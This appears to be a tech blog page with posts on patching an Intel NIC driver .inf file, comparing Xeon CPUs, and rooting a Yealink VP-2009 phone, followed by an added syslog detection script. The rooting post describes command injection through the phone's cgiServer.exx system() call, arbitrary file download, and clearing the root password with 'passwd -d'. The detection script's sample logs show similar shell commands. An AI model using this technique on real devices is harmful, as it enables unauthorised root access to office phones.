Documentation, Hacking, Hardware, Microsoft, Server Technologies

How To: Intel 82579V Gigabit Network Connection – Windows Server 2008 R2

Clearly Intel doesn’t want us to install server OS onto desktop motherboards nowadays.

Look at your driver CD. Navigate to the PRO1000 folder; depending on whether you have a 32-bit or 64-bit OS, you will then want either Win32 or Winx64 (not Win64, which is for Itanium).
The choice for the next folder depends on your OS: NDIS5x is Server 2003 or XP, NDIS61 is Server 2008 or Vista, and NDIS62 is Server 2008 R2 or 7. I presume NDIS63 is for Windows 8 and Server 2012.

Copy the correct folder to your desktop.

In either case, once you have chosen the correct folder, you need to find the .inf file whose name starts with e1c; for Server 2008 R2 64-bit it will be called e1c62x64.inf. Make sure you are working on the copy that now exists on your desktop.

Open the file in Notepad:

;******************************************************************************
; e1c62x64.INF (Intel 64-bit extension Platform Only,
; Windows 7 64-bit extension and Windows Server 2008 R2 64-bit extension)
;
; Intel(R) Gigabit Network connections
;******************************************************************************
;
[Version]
Signature = "$Windows NT$"
Class = Net
ClassGUID = {4d36e972-e325-11ce-bfc1-08002be10318}
Provider = %Intel%
CatalogFile = e1c62x64.cat
DriverVer = 06/21/2012,11.16.96.0
[Manufacturer]
%Intel% = Intel, NTamd64.6.1, NTamd64.6.1.1, NTamd64.6.2
[ControlFlags]
ExcludeFromSelect = \ 
 PCI\VEN_8086&DEV_1502,\ 
 PCI\VEN_8086&DEV_1503
[Intel]
[Intel.NTamd64.6.1.1]
; DisplayName Section DeviceID
; ----------- ------- --------
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025
[Intel.NTamd64.6.1]
; DisplayName Section DeviceID
; ----------- ------- --------
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00011179
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_00021179
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502&SUBSYS_80001025
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00011179
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_00021179
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_80001025
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503&SUBSYS_04911025

If you look in [ControlFlags], you see that there are two device IDs listed. DEV_1502 and DEV_1503.
If you go back to the new computer you built (with no NIC driver installed 🙂 ), in Device Manager, you should see “Ethernet Adapter” listed as an unknown device. Go into the Properties of that, then Details, Hardware Ids. Now, you see that the device should be DEV_1503. Great.

Go back to the Notepad file you have open. You can see that the second section within [Intel], [Intel.NTamd64.6.1], doesn't have anything listed for DEV_1503. Ironically, every other section has Server 2008 R2 provided for. Sneaky Intel, sneaky.

Anyway, copy and paste the two lines that provide for DEV_1503 in the [Intel.NTamd64.6.1.1] section to the new section, like above. Save the file.

Go back to the other computer that still has device manager open (it might be the same computer..), click Driver -> Update Driver, then manually select the desktop location of your NDIS62 directory you copied and then edited.

Driver should install successfully. Hit me up if your mileage varies.
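To confirm which models sections are missing a hardware ID before editing, here is a small checker, added as an example and not part of the original post or Intel's package. `SAMPLE_INF` is abridged from the listing above and shows the file before the DEV_1503 lines are pasted in; the function names are hypothetical.

```python
import re

# Abridged from the listing above, in its state BEFORE the DEV_1503 lines are pasted in.
SAMPLE_INF = r"""
[Manufacturer]
%Intel% = Intel, NTamd64.6.1, NTamd64.6.1.1, NTamd64.6.2
[Intel.NTamd64.6.1.1]
%E1502NC.DeviceDesc% = E1502.6.1.1, PCI\VEN_8086&DEV_1502
%E1503NC.DeviceDesc% = E1503.6.1.1, PCI\VEN_8086&DEV_1503
[Intel.NTamd64.6.1]
%E1502NC.DeviceDesc% = E1502, PCI\VEN_8086&DEV_1502
"""

def parse_sections(text):
    """Return {section_name: [lines]} with comments and blank lines dropped."""
    sections, current = {}, None
    for raw in text.splitlines():
        line = raw.split(";", 1)[0].strip()   # ';' starts an INF comment
        m = re.fullmatch(r"\[(.+)\]", line)
        if m:
            current = m.group(1).strip()
            sections.setdefault(current, [])
        elif line and current is not None:
            sections[current].append(line)
    return sections

def model_sections(sections):
    """Expand [Manufacturer] entries into decorated models section names."""
    names = []
    for line in sections.get("Manufacturer", []):
        parts = [p.strip() for p in line.partition("=")[2].split(",")]
        names += [f"{parts[0]}.{t}" for t in parts[1:]] or [parts[0]]
    return names

def coverage(text, hwid):
    """Map each models section to True/False: does it list hwid exactly?"""
    sections = parse_sections(text)
    result = {}
    for name in model_sections(sections):
        ids = []
        for line in sections.get(name, []):
            fields = [f.strip() for f in line.partition("=")[2].split(",")]
            ids += [f.upper() for f in fields[1:]]   # fields[0] is the install section
        result[name] = hwid.upper() in ids
    return result

if __name__ == "__main__":
    for section, ok in coverage(SAMPLE_INF, r"PCI\VEN_8086&DEV_1503").items():
        print(f"{section}: {'listed' if ok else 'MISSING'}")
```

Because the edited .inf no longer matches the hash recorded in the CatalogFile (e1c62x64.cat), Windows treats the package as unsigned and asks for confirmation during install.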

Hardware

Time to retire the Dell M610 blade? What’s next?

Westmere X5672 vs Nehalem X5570

After analysis of Westmere vs Nehalem;

The gains aren’t small, but neither are they substantial enough to motivate upgrading from Nehalem to Westmere – only in select cases will the gains be in the 40-50% range. Similarly, the power efficiency improvements are nice, but not profound compared to the prior generation.

The clock-rate increase for the 95W TDP chips (including turbo boost) that can be used in the M610 is 3.2GHz to 3.6GHz (I lock my chips to 3.2GHz permanently by disabling all power management in the BIOS and I also disable hyperthreading. YMMV). You’re looking at a mathematical difference of 11%. The extra cost vs the gains support the original conclusion that the gains are not substantial enough to motivate the upgrade.

The Nehalem architecture was kick-ass, and remembering back to my benchmarks in 2008/2009, I saw a thread for thread 30% increase in capability.

If you’re looking at a multi-threaded application, you could see 20-40% increase in performance with the extra 2 cores. Perhaps virtualization would see the most benefit here. However, when you look at the price tag that STILL exists against the X5672 chips, it really looks less appealing than it could, if you were looking for a quick interim upgrade without replacing all your systems.

Again, your mileage may vary. For me, this isn’t a large enough gain to even warrant picking up a couple of chips to test them.

The Nehalem X5570

Interestingly, after performance tuning my BIOS, my benchmark of the CPU gave interesting results compared to the one on CPU Benchmark’s website:

My result was an aggregate score of: 10,232 for CPU Benchmark.
The 2 results recorded on CPU Benchmark’s website: 6,025.

I cannot delve deeper into the tests submitted to the website, but I can only assume that something was wrong with their setup.
If I look at the Single Thread results for my CPU, it is completely (expectedly) destroyed by the Intel Ivy Bridge i7-3770k @ 3.5GHz. 70.1% faster. This is pretty impressive, and I think it warrants a further look into the modern CPUs and building a prototype system for further testing.

Faster, Faster, Faster

My initial research is showing that the best thread-for-thread CPU for applications that aren’t so multi-threaded seems to be the Intel® Xeon® Processor E3-1290V2 (8M Cache, 3.70 GHz) with turbo boost of 4.10GHz. It’s a 4 core chip with 8 threads (HT) on the 22nm lithography and only 87W TDP (wow!). Unfortunately, it looks like it will not accept a multi-CPU configuration system. This might not be a problem for me.

Since I’m in the mix, I’m also looking at the Core i7-3770K 3.5GHz (3.9GHz turbo) chip. I bet this will run stable at 4.10GHz without much trouble. I understand it’s a desktop CPU, but the price alone makes it worth a second look – especially if I’m thinking about self building. Clock for clock, thread for thread, this looks like a great chip. It holds its own against the E3-1290V2 at a fraction of the price. I have a 2600k at home stable for over a year at 4.5GHz.

A side by side of these two chips. They’re pretty similar.

Specification: Intel Core i7-3770K | Intel Xeon E3-1290 v2
Market segment: Desktop | Server
Manufacturer: Intel
Family: Intel Core i7 | Intel Xeon
Model number: i7-3770K | E3-1290 v2
CPU part number: CM8063701211700 | CM8063701099101
Box part number: BX80637I73770K, BXC80637I73770K
Core name: Ivy Bridge | Ivy Bridge-H2
Platform name: Carlow
Microarchitecture: Ivy Bridge
Technology (micron): 0.022
Socket: Socket 1155
Frequency (MHz): 3500 | 3700
Turbo Frequency (MHz): 3900 / 3900 / 3800 / 3700 | 4100 / 4000 / 3900 / 3800
Clock Multiplier: 35 | 37
L1 cache: 128 KB (code) / 128 KB (data)
L2 cache (KB): 1024
L3 cache (KB): 8192
TDP (Watt): 77 | 87
Cores: 4
Multiprocessing: 1

Hacking, Hardware

YeaLink VP-2009 VOIP/Video Phone – r00ted, here’s how..

Awesome phone. Not so awesome code. It took me the best part of 6 hours, but I rooted the bitch. Guide to come!

Now, I just need to see what security risk this poses to me since I now use these phones professionally. Be careful if you use these in your office! At least it’s not so easy to change the actual phone software. It’s a compiled ARM binary. Pity, would have been nice to write custom modules for it. I think it uses some strange XML interface to display content, might be a way to make that display web content of your own choice.

Rough guide:

view-source:192.168.1.114/cgi-bin/cgiServer.exx?

<html>
<head>
<title>syntax error</title>
</head>
<body>
Unkonw GET type : useage ?[page/download/command]=xxx
<br>
</body>
</html>

Oh look, I can download any file from the phone.

Hmm.. command? What is command? Well, we can grab the syslog and see what goes on in there..

Mar 29 10:42:47 mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:command=msgSendMessage(%22app_vpPhone%22,%220xa8004%22,%220%22,%220%22)

Interesting! Alright, so I dig through their web code and I find:

function _SendMessage(thread, uMsg, wParam, lParam)
{
        return "msgSendMessage(\"" + thread + "\",\"" + uMsg + "\",\"" + wParam + "\",\"" + lParam + "\")";
}

I test that via URL, and it works. I think. No errors.

What else do I see here..

function _getFreeSpace(strpath)
{
        return "getFreeSpace(\"" + strpath + "\")";
}

Aha, this works too. With any path, via URL.

However, here’s the money shot right here.. interesting command:

function _system(cmd)
{
        return "system(\"" + cmd + "\")";
}

I see they make calls to it internally:

function doReboot()
{
        //var formInput = document.formInput;
        if(xmlHttpGet(_SendMessage("app_vpPhone", "0xa8004", 0, 0)) == "1")
        {
                alert("Talking, Please save config later.");
                return;
        }
        if(confirm(" Do you want to reboot device?"))
        {
                jsShowPageStatus("main-content", "Rebooting , please wait …", "server-status");
                xmlHttpPostAsyn(_system("reboot >/dev/null 2>&1"), responseXmlHttp);
                return;
        }
}

So, let’s try reboot.. I execute the reboot command via the browser. Boom, it reboots.

After hours of screwing around and banging out recursive ls, df, contents of files, touching new files.. I figure out that they obfuscate user permissions for /etc/

Extract:

1 -rwxr-xr-x    1 1011     1002          601 May 13  2011 passwd
0 -rwxr-xr-x    1 1011     1002           31 May 13  2011 issue.net
0 -rwxr-xr-x    1 1011     1002          452 May 13  2011 nsswitch.conf
0 -rwxr-xr-x    1 1011     1002          421 May 13  2011 inputrc
2 drwxr-xr-x    1 1011     1002         2048 May 13  2011 dhcpc
0 -rwxr-xr-x    1 1011     1002           26 May 13  2011 host.conf
3 -rwxr-xr-x    1 1011     1002         2921 May 13  2011 inetd.conf

Still doesn’t explain why I cannot rm files I’ve created in /tmp or append with echo. I can only create with echo or touch!

Numerous attempts to add a user don’t work. The commands just don’t exist.
I look at the files I create with touch and oh dear oh dear, they’re created by root. No chroot! Or even running as an unprivileged user!

I chown passwd to root:root and then I run passwd -d to remove the password. I overwrite MOTD prior to this as a test, hence the ‘test’.

BAM, I’m in.

Footnote: Now I’ve firewalled this interface off from the rest of the users on my network. Don’t want anyone snooping in on private phone stuff!
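For anyone running these phones, the syslog format quoted above is enough to spot this kind of access. The following is an added detection sketch, not code from the original post or from the phone's firmware. The sample log is constructed (its first entry is the line quoted in the post), and the allowlist assumes the only system() string the web UI sends is the reboot call shown in doReboot().

```python
import re
from urllib.parse import unquote

# Constructed sample: line 1 is the entry quoted in the post, the others copy its format.
PFX = "mini_httpd[772]: mini_httpd.c(1466):path:/cgi-bin/cgiServer.exx,query:"
SAMPLE_LOG = "\n".join([
    f"Mar 29 10:42:47 {PFX}command=msgSendMessage(%22app_vpPhone%22,%220xa8004%22,%220%22,%220%22)",
    f"Mar 29 10:43:02 {PFX}command=system(%22reboot%20%3E/dev/null%202%3E%261%22)",
    f"Mar 29 10:51:19 {PFX}command=system(%22ls%20-lR%20/etc%22)",
    f"Mar 29 10:52:40 {PFX}download=/etc/issue.net",
])

# Assumption: system() strings the phone's own web UI sends (only doReboot() is shown).
WEB_UI_SYSTEM_CALLS = {"reboot >/dev/null 2>&1"}

LINE = re.compile(r"^(?P<ts>\w{3}\s+\d+ [\d:]{8}) mini_httpd\[\d+\]: .*?"
                  r"path:/cgi-bin/cgiServer\.exx,query:(?P<query>.*)$")

def classify(query):
    """Return (severity, detail) for one cgiServer.exx query string."""
    kind, _, value = unquote(query).partition("=")
    if kind == "download":
        return "alert", f"file download: {value}"
    if kind == "command":
        m = re.match(r'\s*system\s*\(\s*"?(.*?)"?\s*\)\s*$', value, re.S)
        if m is None:
            return "info", f"cgi call: {value}"
        if m.group(1) in WEB_UI_SYSTEM_CALLS:
            return "info", f"web UI system call: {m.group(1)}"
        return "alert", f"shell command: {m.group(1)}"
    return "info", f"other request: {kind}"

def scan(log_text):
    """Return (timestamp, severity, detail) for every cgiServer.exx request logged."""
    findings = []
    for line in log_text.splitlines():
        m = LINE.match(line)
        if m:
            findings.append((m.group("ts"), *classify(m.group("query"))))
    return findings

if __name__ == "__main__":
    for ts, severity, detail in scan(SAMPLE_LOG):
        print(f"{ts} [{severity}] {detail}")
```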